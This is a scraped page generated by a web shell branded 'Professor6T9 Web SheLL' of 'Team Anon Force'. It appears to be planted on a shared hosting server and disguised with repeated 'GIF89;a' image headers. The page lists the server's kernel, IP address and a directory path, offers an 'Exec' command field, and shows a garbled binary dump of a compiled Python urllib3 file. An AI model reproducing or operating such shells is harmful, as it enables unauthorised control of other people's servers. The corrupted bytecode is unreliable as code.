GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python311
/
lib
/
python3.11
/
site-packages
/
pip
/
_vendor
/
urllib3
/
contrib
/
__pycache__
[ HOME ]
Exec
Submit
ntlmpool.cpython-311.pyc
� �Re� � � � d Z ddlmZ ddlZddlmZ ddlmZ ddlmZ ddl m Z ej d e� � ee � � Z G d � de� � ZdS )z NTLM authenticating pool, contributed by erikcederstran Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10 � )�absolute_importN)� getLogger)�ntlm� )�HTTPSConnectionPool)�HTTPSConnectiona# The 'urllib3.contrib.ntlmpool' module is deprecated and will be removed in urllib3 v2.0 release, urllib3 is not able to support it properly due to reasons listed in issue: https://github.com/urllib3/urllib3/issues/2282. If you are a user of this module please comment in the mentioned issue.c �B � � e Zd ZdZdZ� fd�Zd� Z d � fd� Z� xZS ) �NTLMConnectionPoolzQ Implements an NTLM authentication version of an urllib3 connection pool �httpsc � �� t t | � � j |i |�� || _ || _ |� dd� � }|d � � � | _ |d | _ || _ dS )z� authurl is a random URL on the server that is protected by NTLM. user is the Windows user, probably in the DOMAIN\username format. pw is the password for the user. �\� r N) �superr �__init__�authurl�rawuser�split�upper�domain�user�pw)�selfr r r �args�kwargs� user_parts� __class__s ���/builddir/build/BUILDROOT/alt-python311-pip-21.3.1-3.el8.x86_64/opt/alt/python311/lib/python3.11/site-packages/pip/_vendor/urllib3/contrib/ntlmpool.pyr zNTLMConnectionPool.__init__"